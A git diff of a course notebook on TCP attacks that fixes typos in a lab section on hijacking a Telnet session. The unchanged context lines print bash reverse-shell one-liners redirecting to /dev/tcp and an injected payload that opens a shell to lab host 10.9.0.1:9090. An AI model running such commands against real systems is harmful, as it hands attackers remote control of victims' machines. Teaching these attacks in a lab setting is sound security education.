--- a/course/notebooks/TCPAttacks.ipynb
+++ b/course/notebooks/TCPAttacks.ipynb
@@ -253,7 +253,7 @@
     "\n",
     "- instead of running *cat*, we can run a shell program on the server\n",
     "- instead of using local standard input and output to execute the shell command and see the results, we can use a TCP connection for both input and output of the shell\n",
-    "- such a shell is called *reverse shell**\n",
+    "- such a shell is called *reverse shell*\n",
     "- **0**, **1**, and **2** are standard input, output and error streams on `*nix` systems\n",
     "- redirect the standard output to `/dev/tcp/...` for bash command\n",
     "- redirect the standard error to standard ouput stream which redirects to `/dev/tcp...`\n",
@@ -264,11 +264,11 @@
     "/bin/bash -i > /dev/tcp/<host>/<port> 2>&1\n",
     "/bin/bash -i > /dev/tcp/<host><port> 2>&1 0<&1\n",
     "```\n",
-    "- attcker can send the following command to get a reverse shell on the Telnet server\n",
+    "- attacker can send the following command to get a reverse shell on the Telnet server\n",
     "```txt\n",
     "data = \"\\r /bin/bash -i > /dev/tcp/10.9.0.1/9090 2>&1 0<&1 \\r\"\n",
     "```\n",
-    "- rerun the experiement and see if you get a reverse shell\n",
+    "- rerun the experiement and see if the attacker can get a reverse shell!\n",
     "\n"
    ]
   },
